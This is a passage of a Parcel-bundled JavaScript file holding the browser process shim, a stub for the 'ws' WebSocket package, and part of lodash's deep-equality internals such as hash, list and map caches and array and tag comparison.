        while(++$cfae44f0dfdf62c0$var$queueIndex < len)if ($cfae44f0dfdf62c0$var$currentQueue) $cfae44f0dfdf62c0$var$currentQueue[$cfae44f0dfdf62c0$var$queueIndex].run();
        $cfae44f0dfdf62c0$var$queueIndex = -1;
        len = $cfae44f0dfdf62c0$var$queue.length;
    }
    $cfae44f0dfdf62c0$var$currentQueue = null;
    $cfae44f0dfdf62c0$var$draining = false;
    $cfae44f0dfdf62c0$var$runClearTimeout(timeout);
}
$cfae44f0dfdf62c0$var$process.nextTick = function(fun) {
    var args = new Array(arguments.length - 1);
    if (arguments.length > 1) for(var i = 1; i < arguments.length; i++)args[i - 1] = arguments[i];
    $cfae44f0dfdf62c0$var$queue.push(new $cfae44f0dfdf62c0$var$Item(fun, args));
    if ($cfae44f0dfdf62c0$var$queue.length === 1 && !$cfae44f0dfdf62c0$var$draining) $cfae44f0dfdf62c0$var$runTimeout($cfae44f0dfdf62c0$var$drainQueue);
};
// v8 likes predictible objects
function $cfae44f0dfdf62c0$var$Item(fun, array) {
    this.fun = fun;
    this.array = array;
}
$cfae44f0dfdf62c0$var$Item.prototype.run = function() {
    this.fun.apply(null, this.array);
};
$cfae44f0dfdf62c0$var$process.title = "browser";
$cfae44f0dfdf62c0$var$process.browser = true;
$cfae44f0dfdf62c0$var$process.env = {};
$cfae44f0dfdf62c0$var$process.argv = [];
$cfae44f0dfdf62c0$var$process.version = ""; // empty string to avoid regexp issues
$cfae44f0dfdf62c0$var$process.versions = {};
function $cfae44f0dfdf62c0$var$noop() {}
$cfae44f0dfdf62c0$var$process.on = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.addListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.once = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.off = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.removeListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.removeAllListeners = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.emit = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.prependListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.prependOnceListener = $cfae44f0dfdf62c0$var$noop;
$cfae44f0dfdf62c0$var$process.listeners = function(name) {
    return [];
};
$cfae44f0dfdf62c0$var$process.binding = function(name) {
    throw new Error("process.binding is not supported");
};
$cfae44f0dfdf62c0$var$process.cwd = function() {
    return "/";
};
$cfae44f0dfdf62c0$var$process.chdir = function(dir) {
    throw new Error("process.chdir is not supported");
};
$cfae44f0dfdf62c0$var$process.umask = function() {
    return 0;
};

});


parcelRequire.register("jlahN", function(module, exports) {
"use strict";
module.exports = function() {
    throw new Error("ws does not work in the browser. Browser clients must use the native WebSocket object");
};

});

parcelRequire.register("6cqMT", function(module, exports) {
/**
 * Lodash (Custom Build) <https://lodash.com/>
 * Build: `lodash modularize exports="npm" -o ./`
 * Copyright JS Foundation and other contributors <https://js.foundation/>
 * Released under MIT license <https://lodash.com/license>
 * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>
 * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
 */ /** Used as the size to enable large array optimizations. */ var LARGE_ARRAY_SIZE = 200;
/** Used to stand-in for `undefined` hash values. */ var HASH_UNDEFINED = "__lodash_hash_undefined__";
/** Used to compose bitmasks for value comparisons. */ var COMPARE_PARTIAL_FLAG = 1, COMPARE_UNORDERED_FLAG = 2;
/** Used as references for various `Number` constants. */ var MAX_SAFE_INTEGER = 9007199254740991;
/** `Object#toString` result references. */ var argsTag = "[object Arguments]", arrayTag = "[object Array]", asyncTag = "[object AsyncFunction]", boolTag = "[object Boolean]", dateTag = "[object Date]", errorTag = "[object Error]", funcTag = "[object Function]", genTag = "[object GeneratorFunction]", mapTag = "[object Map]", numberTag = "[object Number]", nullTag = "[object Null]", objectTag = "[object Object]", promiseTag = "[object Promise]", proxyTag = "[object Proxy]", regexpTag = "[object RegExp]", setTag = "[object Set]", stringTag = "[object String]", symbolTag = "[object Symbol]", undefinedTag = "[object Undefined]", weakMapTag = "[object WeakMap]";
var arrayBufferTag = "[object ArrayBuffer]", dataViewTag = "[object DataView]", float32Tag = "[object Float32Array]", float64Tag = "[object Float64Array]", int8Tag = "[object Int8Array]", int16Tag = "[object Int16Array]", int32Tag = "[object Int32Array]", uint8Tag = "[object Uint8Array]", uint8ClampedTag = "[object Uint8ClampedArray]", uint16Tag = "[object Uint16Array]", uint32Tag = "[object Uint32Array]";
/**
 * Used to match `RegExp`
 * [syntax characters](http://ecma-international.org/ecma-262/7.0/#sec-patterns).
 */ var reRegExpChar = /[\\^$.*+?()[\]{}|]/g;
/** Used to detect host constructors (Safari). */ var reIsHostCtor = /^\[object .+?Constructor\]$/;
/** Used to detect unsigned integer values. */ var reIsUint = /^(?:0|[1-9]\d*)$/;
/** Used to identify `toStringTag` values of typed arrays. */ var typedArrayTags = {};
typedArrayTags[float32Tag] = typedArrayTags[float64Tag] = typedArrayTags[int8Tag] = typedArrayTags[int16Tag] = typedArrayTags[int32Tag] = typedArrayTags[uint8Tag] = typedArrayTags[uint8ClampedTag] = typedArrayTags[uint16Tag] = typedArrayTags[uint32Tag] = true;
typedArrayTags[argsTag] = typedArrayTags[arrayTag] = typedArrayTags[arrayBufferTag] = typedArrayTags[boolTag] = typedArrayTags[dataViewTag] = typedArrayTags[dateTag] = typedArrayTags[errorTag] = typedArrayTags[funcTag] = typedArrayTags[mapTag] = typedArrayTags[numberTag] = typedArrayTags[objectTag] = typedArrayTags[regexpTag] = typedArrayTags[setTag] = typedArrayTags[stringTag] = typedArrayTags[weakMapTag] = false;
/** Detect free variable `global` from Node.js. */ var freeGlobal = typeof $parcel$global == "object" && $parcel$global && $parcel$global.Object === Object && $parcel$global;
/** Detect free variable `self`. */ var freeSelf = typeof self == "object" && self && self.Object === Object && self;
/** Used as a reference to the global object. */ var root = freeGlobal || freeSelf || Function("return this")();
/** Detect free variable `exports`. */ var freeExports = exports && !exports.nodeType && exports;
/** Detect free variable `module`. */ var freeModule = freeExports && true && module && !module.nodeType && module;
/** Detect the popular CommonJS extension `module.exports`. */ var moduleExports = freeModule && freeModule.exports === freeExports;
/** Detect free variable `process` from Node.js. */ var freeProcess = moduleExports && freeGlobal.process;
/** Used to access faster Node.js helpers. */ var nodeUtil = function() {
    try {
        return freeProcess && freeProcess.binding && freeProcess.binding("util");
    } catch (e) {}
}();
/* Node.js helper references. */ var nodeIsTypedArray = nodeUtil && nodeUtil.isTypedArray;
/**
 * A specialized version of `_.filter` for arrays without support for
 * iteratee shorthands.
 *
 * @private
 * @param {Array} [array] The array to iterate over.
 * @param {Function} predicate The function invoked per iteration.
 * @returns {Array} Returns the new filtered array.
 */ function arrayFilter(array, predicate) {
    var index = -1, length = array == null ? 0 : array.length, resIndex = 0, result = [];
    while(++index < length){
        var value = array[index];
        if (predicate(value, index, array)) result[resIndex++] = value;
    }
    return result;
}
/**
 * Appends the elements of `values` to `array`.
 *
 * @private
 * @param {Array} array The array to modify.
 * @param {Array} values The values to append.
 * @returns {Array} Returns `array`.
 */ function arrayPush(array, values) {
    var index = -1, length = values.length, offset = array.length;
    while(++index < length)array[offset + index] = values[index];
    return array;
}
/**
 * A specialized version of `_.some` for arrays without support for iteratee
 * shorthands.
 *
 * @private
 * @param {Array} [array] The array to iterate over.
 * @param {Function} predicate The function invoked per iteration.
 * @returns {boolean} Returns `true` if any element passes the predicate check,
 *  else `false`.
 */ function arraySome(array, predicate) {
    var index = -1, length = array == null ? 0 : array.length;
    while(++index < length){
        if (predicate(array[index], index, array)) return true;
    }
    return false;
}
/**
 * The base implementation of `_.times` without support for iteratee shorthands
 * or max array length checks.
 *
 * @private
 * @param {number} n The number of times to invoke `iteratee`.
 * @param {Function} iteratee The function invoked per iteration.
 * @returns {Array} Returns the array of results.
 */ function baseTimes(n, iteratee) {
    var index = -1, result = Array(n);
    while(++index < n)result[index] = iteratee(index);
    return result;
}
/**
 * The base implementation of `_.unary` without support for storing metadata.
 *
 * @private
 * @param {Function} func The function to cap arguments for.
 * @returns {Function} Returns the new capped function.
 */ function baseUnary(func) {
    return function(value) {
        return func(value);
    };
}
/**
 * Checks if a `cache` value for `key` exists.
 *
 * @private
 * @param {Object} cache The cache to query.
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function cacheHas(cache, key) {
    return cache.has(key);
}
/**
 * Gets the value at `key` of `object`.
 *
 * @private
 * @param {Object} [object] The object to query.
 * @param {string} key The key of the property to get.
 * @returns {*} Returns the property value.
 */ function getValue(object, key) {
    return object == null ? undefined : object[key];
}
/**
 * Converts `map` to its key-value pairs.
 *
 * @private
 * @param {Object} map The map to convert.
 * @returns {Array} Returns the key-value pairs.
 */ function mapToArray(map) {
    var index = -1, result = Array(map.size);
    map.forEach(function(value, key) {
        result[++index] = [
            key,
            value
        ];
    });
    return result;
}
/**
 * Creates a unary function that invokes `func` with its argument transformed.
 *
 * @private
 * @param {Function} func The function to wrap.
 * @param {Function} transform The argument transform.
 * @returns {Function} Returns the new function.
 */ function overArg(func, transform) {
    return function(arg) {
        return func(transform(arg));
    };
}
/**
 * Converts `set` to an array of its values.
 *
 * @private
 * @param {Object} set The set to convert.
 * @returns {Array} Returns the values.
 */ function setToArray(set) {
    var index = -1, result = Array(set.size);
    set.forEach(function(value) {
        result[++index] = value;
    });
    return result;
}
/** Used for built-in method references. */ var arrayProto = Array.prototype, funcProto = Function.prototype, objectProto = Object.prototype;
/** Used to detect overreaching core-js shims. */ var coreJsData = root["__core-js_shared__"];
/** Used to resolve the decompiled source of functions. */ var funcToString = funcProto.toString;
/** Used to check objects for own properties. */ var hasOwnProperty = objectProto.hasOwnProperty;
/** Used to detect methods masquerading as native. */ var maskSrcKey = function() {
    var uid = /[^.]+$/.exec(coreJsData && coreJsData.keys && coreJsData.keys.IE_PROTO || "");
    return uid ? "Symbol(src)_1." + uid : "";
}();
/**
 * Used to resolve the
 * [`toStringTag`](http://ecma-international.org/ecma-262/7.0/#sec-object.prototype.tostring)
 * of values.
 */ var nativeObjectToString = objectProto.toString;
/** Used to detect if a method is native. */ var reIsNative = RegExp("^" + funcToString.call(hasOwnProperty).replace(reRegExpChar, "\\$&").replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g, "$1.*?") + "$");
/** Built-in value references. */ var Buffer = moduleExports ? root.Buffer : undefined, Symbol = root.Symbol, Uint8Array = root.Uint8Array, propertyIsEnumerable = objectProto.propertyIsEnumerable, splice = arrayProto.splice, symToStringTag = Symbol ? Symbol.toStringTag : undefined;
/* Built-in method references for those with the same name as other `lodash` methods. */ var nativeGetSymbols = Object.getOwnPropertySymbols, nativeIsBuffer = Buffer ? Buffer.isBuffer : undefined, nativeKeys = overArg(Object.keys, Object);
/* Built-in method references that are verified to be native. */ var DataView = getNative(root, "DataView"), Map = getNative(root, "Map"), Promise = getNative(root, "Promise"), Set = getNative(root, "Set"), WeakMap = getNative(root, "WeakMap"), nativeCreate = getNative(Object, "create");
/** Used to detect maps, sets, and weakmaps. */ var dataViewCtorString = toSource(DataView), mapCtorString = toSource(Map), promiseCtorString = toSource(Promise), setCtorString = toSource(Set), weakMapCtorString = toSource(WeakMap);
/** Used to convert symbols to primitives and strings. */ var symbolProto = Symbol ? Symbol.prototype : undefined, symbolValueOf = symbolProto ? symbolProto.valueOf : undefined;
/**
 * Creates a hash object.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function Hash(entries) {
    var index = -1, length = entries == null ? 0 : entries.length;
    this.clear();
    while(++index < length){
        var entry = entries[index];
        this.set(entry[0], entry[1]);
    }
}
/**
 * Removes all key-value entries from the hash.
 *
 * @private
 * @name clear
 * @memberOf Hash
 */ function hashClear() {
    this.__data__ = nativeCreate ? nativeCreate(null) : {};
    this.size = 0;
}
/**
 * Removes `key` and its value from the hash.
 *
 * @private
 * @name delete
 * @memberOf Hash
 * @param {Object} hash The hash to modify.
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function hashDelete(key) {
    var result = this.has(key) && delete this.__data__[key];
    this.size -= result ? 1 : 0;
    return result;
}
/**
 * Gets the hash value for `key`.
 *
 * @private
 * @name get
 * @memberOf Hash
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function hashGet(key) {
    var data = this.__data__;
    if (nativeCreate) {
        var result = data[key];
        return result === HASH_UNDEFINED ? undefined : result;
    }
    return hasOwnProperty.call(data, key) ? data[key] : undefined;
}
/**
 * Checks if a hash value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf Hash
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function hashHas(key) {
    var data = this.__data__;
    return nativeCreate ? data[key] !== undefined : hasOwnProperty.call(data, key);
}
/**
 * Sets the hash `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf Hash
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the hash instance.
 */ function hashSet(key, value) {
    var data = this.__data__;
    this.size += this.has(key) ? 0 : 1;
    data[key] = nativeCreate && value === undefined ? HASH_UNDEFINED : value;
    return this;
}
// Add methods to `Hash`.
Hash.prototype.clear = hashClear;
Hash.prototype["delete"] = hashDelete;
Hash.prototype.get = hashGet;
Hash.prototype.has = hashHas;
Hash.prototype.set = hashSet;
/**
 * Creates an list cache object.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function ListCache(entries) {
    var index = -1, length = entries == null ? 0 : entries.length;
    this.clear();
    while(++index < length){
        var entry = entries[index];
        this.set(entry[0], entry[1]);
    }
}
/**
 * Removes all key-value entries from the list cache.
 *
 * @private
 * @name clear
 * @memberOf ListCache
 */ function listCacheClear() {
    this.__data__ = [];
    this.size = 0;
}
/**
 * Removes `key` and its value from the list cache.
 *
 * @private
 * @name delete
 * @memberOf ListCache
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function listCacheDelete(key) {
    var data = this.__data__, index = assocIndexOf(data, key);
    if (index < 0) return false;
    var lastIndex = data.length - 1;
    if (index == lastIndex) data.pop();
    else splice.call(data, index, 1);
    --this.size;
    return true;
}
/**
 * Gets the list cache value for `key`.
 *
 * @private
 * @name get
 * @memberOf ListCache
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function listCacheGet(key) {
    var data = this.__data__, index = assocIndexOf(data, key);
    return index < 0 ? undefined : data[index][1];
}
/**
 * Checks if a list cache value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf ListCache
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function listCacheHas(key) {
    return assocIndexOf(this.__data__, key) > -1;
}
/**
 * Sets the list cache `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf ListCache
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the list cache instance.
 */ function listCacheSet(key, value) {
    var data = this.__data__, index = assocIndexOf(data, key);
    if (index < 0) {
        ++this.size;
        data.push([
            key,
            value
        ]);
    } else data[index][1] = value;
    return this;
}
// Add methods to `ListCache`.
ListCache.prototype.clear = listCacheClear;
ListCache.prototype["delete"] = listCacheDelete;
ListCache.prototype.get = listCacheGet;
ListCache.prototype.has = listCacheHas;
ListCache.prototype.set = listCacheSet;
/**
 * Creates a map cache object to store key-value pairs.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function MapCache(entries) {
    var index = -1, length = entries == null ? 0 : entries.length;
    this.clear();
    while(++index < length){
        var entry = entries[index];
        this.set(entry[0], entry[1]);
    }
}
/**
 * Removes all key-value entries from the map.
 *
 * @private
 * @name clear
 * @memberOf MapCache
 */ function mapCacheClear() {
    this.size = 0;
    this.__data__ = {
        "hash": new Hash,
        "map": new (Map || ListCache),
        "string": new Hash
    };
}
/**
 * Removes `key` and its value from the map.
 *
 * @private
 * @name delete
 * @memberOf MapCache
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function mapCacheDelete(key) {
    var result = getMapData(this, key)["delete"](key);
    this.size -= result ? 1 : 0;
    return result;
}
/**
 * Gets the map value for `key`.
 *
 * @private
 * @name get
 * @memberOf MapCache
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function mapCacheGet(key) {
    return getMapData(this, key).get(key);
}
/**
 * Checks if a map value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf MapCache
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function mapCacheHas(key) {
    return getMapData(this, key).has(key);
}
/**
 * Sets the map `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf MapCache
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the map cache instance.
 */ function mapCacheSet(key, value) {
    var data = getMapData(this, key), size = data.size;
    data.set(key, value);
    this.size += data.size == size ? 0 : 1;
    return this;
}
// Add methods to `MapCache`.
MapCache.prototype.clear = mapCacheClear;
MapCache.prototype["delete"] = mapCacheDelete;
MapCache.prototype.get = mapCacheGet;
MapCache.prototype.has = mapCacheHas;
MapCache.prototype.set = mapCacheSet;
/**
 *
 * Creates an array cache object to store unique values.
 *
 * @private
 * @constructor
 * @param {Array} [values] The values to cache.
 */ function SetCache(values) {
    var index = -1, length = values == null ? 0 : values.length;
    this.__data__ = new MapCache;
    while(++index < length)this.add(values[index]);
}
/**
 * Adds `value` to the array cache.
 *
 * @private
 * @name add
 * @memberOf SetCache
 * @alias push
 * @param {*} value The value to cache.
 * @returns {Object} Returns the cache instance.
 */ function setCacheAdd(value) {
    this.__data__.set(value, HASH_UNDEFINED);
    return this;
}
/**
 * Checks if `value` is in the array cache.
 *
 * @private
 * @name has
 * @memberOf SetCache
 * @param {*} value The value to search for.
 * @returns {number} Returns `true` if `value` is found, else `false`.
 */ function setCacheHas(value) {
    return this.__data__.has(value);
}
// Add methods to `SetCache`.
SetCache.prototype.add = SetCache.prototype.push = setCacheAdd;
SetCache.prototype.has = setCacheHas;
/**
 * Creates a stack cache object to store key-value pairs.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */ function Stack(entries) {
    var data = this.__data__ = new ListCache(entries);
    this.size = data.size;
}
/**
 * Removes all key-value entries from the stack.
 *
 * @private
 * @name clear
 * @memberOf Stack
 */ function stackClear() {
    this.__data__ = new ListCache;
    this.size = 0;
}
/**
 * Removes `key` and its value from the stack.
 *
 * @private
 * @name delete
 * @memberOf Stack
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */ function stackDelete(key) {
    var data = this.__data__, result = data["delete"](key);
    this.size = data.size;
    return result;
}
/**
 * Gets the stack value for `key`.
 *
 * @private
 * @name get
 * @memberOf Stack
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */ function stackGet(key) {
    return this.__data__.get(key);
}
/**
 * Checks if a stack value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf Stack
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */ function stackHas(key) {
    return this.__data__.has(key);
}
/**
 * Sets the stack `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf Stack
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the stack cache instance.
 */ function stackSet(key, value) {
    var data = this.__data__;
    if (data instanceof ListCache) {
        var pairs = data.__data__;
        if (!Map || pairs.length < LARGE_ARRAY_SIZE - 1) {
            pairs.push([
                key,
                value
            ]);
            this.size = ++data.size;
            return this;
        }
        data = this.__data__ = new MapCache(pairs);
    }
    data.set(key, value);
    this.size = data.size;
    return this;
}
// Add methods to `Stack`.
Stack.prototype.clear = stackClear;
Stack.prototype["delete"] = stackDelete;
Stack.prototype.get = stackGet;
Stack.prototype.has = stackHas;
Stack.prototype.set = stackSet;
/**
 * Creates an array of the enumerable property names of the array-like `value`.
 *
 * @private
 * @param {*} value The value to query.
 * @param {boolean} inherited Specify returning inherited property names.
 * @returns {Array} Returns the array of property names.
 */ function arrayLikeKeys(value, inherited) {
    var isArr = isArray(value), isArg = !isArr && isArguments(value), isBuff = !isArr && !isArg && isBuffer(value), isType = !isArr && !isArg && !isBuff && isTypedArray(value), skipIndexes = isArr || isArg || isBuff || isType, result = skipIndexes ? baseTimes(value.length, String) : [], length = result.length;
    for(var key in value)if ((inherited || hasOwnProperty.call(value, key)) && !(skipIndexes && // Safari 9 has enumerable `arguments.length` in strict mode.
    (key == "length" || // Node.js 0.10 has enumerable non-index properties on buffers.
    isBuff && (key == "offset" || key == "parent") || // PhantomJS 2 has enumerable non-index properties on typed arrays.
    isType && (key == "buffer" || key == "byteLength" || key == "byteOffset") || // Skip index properties.
    isIndex(key, length)))) result.push(key);
    return result;
}
/**
 * Gets the index at which the `key` is found in `array` of key-value pairs.
 *
 * @private
 * @param {Array} array The array to inspect.
 * @param {*} key The key to search for.
 * @returns {number} Returns the index of the matched value, else `-1`.
 */ function assocIndexOf(array, key) {
    var length = array.length;
    while(length--){
        if (eq(array[length][0], key)) return length;
    }
    return -1;
}
/**
 * The base implementation of `getAllKeys` and `getAllKeysIn` which uses
 * `keysFunc` and `symbolsFunc` to get the enumerable property names and
 * symbols of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @param {Function} keysFunc The function to get the keys of `object`.
 * @param {Function} symbolsFunc The function to get the symbols of `object`.
 * @returns {Array} Returns the array of property names and symbols.
 */ function baseGetAllKeys(object, keysFunc, symbolsFunc) {
    var result = keysFunc(object);
    return isArray(object) ? result : arrayPush(result, symbolsFunc(object));
}
/**
 * The base implementation of `getTag` without fallbacks for buggy environments.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the `toStringTag`.
 */ function baseGetTag(value) {
    if (value == null) return value === undefined ? undefinedTag : nullTag;
    return symToStringTag && symToStringTag in Object(value) ? getRawTag(value) : objectToString(value);
}
/**
 * The base implementation of `_.isArguments`.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an `arguments` object,
 */ function baseIsArguments(value) {
    return isObjectLike(value) && baseGetTag(value) == argsTag;
}
/**
 * The base implementation of `_.isEqual` which supports partial comparisons
 * and tracks traversed objects.
 *
 * @private
 * @param {*} value The value to compare.
 * @param {*} other The other value to compare.
 * @param {boolean} bitmask The bitmask flags.
 *  1 - Unordered comparison
 *  2 - Partial comparison
 * @param {Function} [customizer] The function to customize comparisons.
 * @param {Object} [stack] Tracks traversed `value` and `other` objects.
 * @returns {boolean} Returns `true` if the values are equivalent, else `false`.
 */ function baseIsEqual(value, other, bitmask, customizer, stack) {
    if (value === other) return true;
    if (value == null || other == null || !isObjectLike(value) && !isObjectLike(other)) return value !== value && other !== other;
    return baseIsEqualDeep(value, other, bitmask, customizer, baseIsEqual, stack);
}
/**
 * A specialized version of `baseIsEqual` for arrays and objects which performs
 * deep comparisons and tracks traversed objects enabling objects with circular
 * references to be compared.
 *
 * @private
 * @param {Object} object The object to compare.
 * @param {Object} other The other object to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} [stack] Tracks traversed `object` and `other` objects.
 * @returns {boolean} Returns `true` if the objects are equivalent, else `false`.
 */ function baseIsEqualDeep(object, other, bitmask, customizer, equalFunc, stack) {
    var objIsArr = isArray(object), othIsArr = isArray(other), objTag = objIsArr ? arrayTag : getTag(object), othTag = othIsArr ? arrayTag : getTag(other);
    objTag = objTag == argsTag ? objectTag : objTag;
    othTag = othTag == argsTag ? objectTag : othTag;
    var objIsObj = objTag == objectTag, othIsObj = othTag == objectTag, isSameTag = objTag == othTag;
    if (isSameTag && isBuffer(object)) {
        if (!isBuffer(other)) return false;
        objIsArr = true;
        objIsObj = false;
    }
    if (isSameTag && !objIsObj) {
        stack || (stack = new Stack);
        return objIsArr || isTypedArray(object) ? equalArrays(object, other, bitmask, customizer, equalFunc, stack) : equalByTag(object, other, objTag, bitmask, customizer, equalFunc, stack);
    }
    if (!(bitmask & COMPARE_PARTIAL_FLAG)) {
        var objIsWrapped = objIsObj && hasOwnProperty.call(object, "__wrapped__"), othIsWrapped = othIsObj && hasOwnProperty.call(other, "__wrapped__");
        if (objIsWrapped || othIsWrapped) {
            var objUnwrapped = objIsWrapped ? object.value() : object, othUnwrapped = othIsWrapped ? other.value() : other;
            stack || (stack = new Stack);
            return equalFunc(objUnwrapped, othUnwrapped, bitmask, customizer, stack);
        }
    }
    if (!isSameTag) return false;
    stack || (stack = new Stack);
    return equalObjects(object, other, bitmask, customizer, equalFunc, stack);
}
/**
 * The base implementation of `_.isNative` without bad shim checks.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a native function,
 *  else `false`.
 */ function baseIsNative(value) {
    if (!isObject(value) || isMasked(value)) return false;
    var pattern = isFunction(value) ? reIsNative : reIsHostCtor;
    return pattern.test(toSource(value));
}
/**
 * The base implementation of `_.isTypedArray` without Node.js optimizations.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a typed array, else `false`.
 */ function baseIsTypedArray(value) {
    return isObjectLike(value) && isLength(value.length) && !!typedArrayTags[baseGetTag(value)];
}
/**
 * The base implementation of `_.keys` which doesn't treat sparse arrays as dense.
 *
 * @private
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of property names.
 */ function baseKeys(object) {
    if (!isPrototype(object)) return nativeKeys(object);
    var result = [];
    for(var key in Object(object))if (hasOwnProperty.call(object, key) && key != "constructor") result.push(key);
    return result;
}
/**
 * A specialized version of `baseIsEqualDeep` for arrays with support for
 * partial deep comparisons.
 *
 * @private
 * @param {Array} array The array to compare.
 * @param {Array} other The other array to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} stack Tracks traversed `array` and `other` objects.
 * @returns {boolean} Returns `true` if the arrays are equivalent, else `false`.
 */ function equalArrays(array, other, bitmask, customizer, equalFunc, stack) {
    var isPartial = bitmask & COMPARE_PARTIAL_FLAG, arrLength = array.length, othLength = other.length;
    if (arrLength != othLength && !(isPartial && othLength > arrLength)) return false;
    // Assume cyclic values are equal.
    var stacked = stack.get(array);
    if (stacked && stack.get(other)) return stacked == other;
    var index = -1, result = true, seen = bitmask & COMPARE_UNORDERED_FLAG ? new SetCache : undefined;
    stack.set(array, other);
    stack.set(other, array);
    // Ignore non-index properties.
    while(++index < arrLength){
        var arrValue = array[index], othValue = other[index];
        if (customizer) var compared = isPartial ? customizer(othValue, arrValue, index, other, array, stack) : customizer(arrValue, othValue, index, array, other, stack);
        if (compared !== undefined) {
            if (compared) continue;
            result = false;
            break;
        }
        // Recursively compare arrays (susceptible to call stack limits).
        if (seen) {
            if (!arraySome(other, function(othValue, othIndex) {
                if (!cacheHas(seen, othIndex) && (arrValue === othValue || equalFunc(arrValue, othValue, bitmask, customizer, stack))) return seen.push(othIndex);
            })) {
                result = false;
                break;
            }
        } else if (!(arrValue === othValue || equalFunc(arrValue, othValue, bitmask, customizer, stack))) {
            result = false;
            break;
        }
    }
    stack["delete"](array);
    stack["delete"](other);
    return result;
}
/**
 * A specialized version of `baseIsEqualDeep` for comparing objects of
 * the same `toStringTag`.
 *
 * **Note:** This function only supports comparing values with tags of
 * `Boolean`, `Date`, `Error`, `Number`, `RegExp`, or `String`.
 *
 * @private
 * @param {Object} object The object to compare.
 * @param {Object} other The other object to compare.
 * @param {string} tag The `toStringTag` of the objects to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} stack Tracks traversed `object` and `other` objects.
 * @returns {boolean} Returns `true` if the objects are equivalent, else `false`.
 */ function equalByTag(object, other, tag, bitmask, customizer, equalFunc, stack) {
    switch(tag){
        case dataViewTag:
            if (object.byteLength != other.byteLength || object.byteOffset != other.byteOffset) return false;
            object = object.buffer;
            other = other.buffer;
        case arrayBufferTag:
            if (object.byteLength != other.byteLength || !equalFunc(new Uint8Array(object), new Uint8Array(other))) return false;
            return true;
        case boolTag:
        case dateTag:
        case numberTag:
            // Coerce booleans to `1` or `0` and dates to milliseconds.
            // Invalid dates are coerced to `NaN`.
            return eq(+object, +other);
        case errorTag:
            return object.name == other.name && object.message == other.message;
        case regexpTag:
        case stringTag:
            // Coerce regexes to strings and treat strings, primitives and objects,
            // as equal. See http://www.ecma-international.org/ecma-262/7.0/#sec-regexp.prototype.tostring
            // for more details.
            return object == other + "";
        case mapTag:
            var convert = mapToArray;
        case setTag:
            var isPartial = bitmask & COMPARE_PARTIAL_FLAG;
            convert || (convert = setToArray);
            if (object.size != other.size && !isPartial) return false;
            // Assume cyclic values are equal.
            var stacked = stack.get(object);
            if (stacked) return stacked == other;
            bitmask |= COMPARE_UNORDERED_FLAG;
            // Recursively compare objects (susceptible to call stack limits).
            stack.set(object, other);
            var result = equalArrays(convert(object), convert(other), bitmask, customizer, equalFunc, stack);
            stack["delete"](object);
            return result;
        case symbolTag:
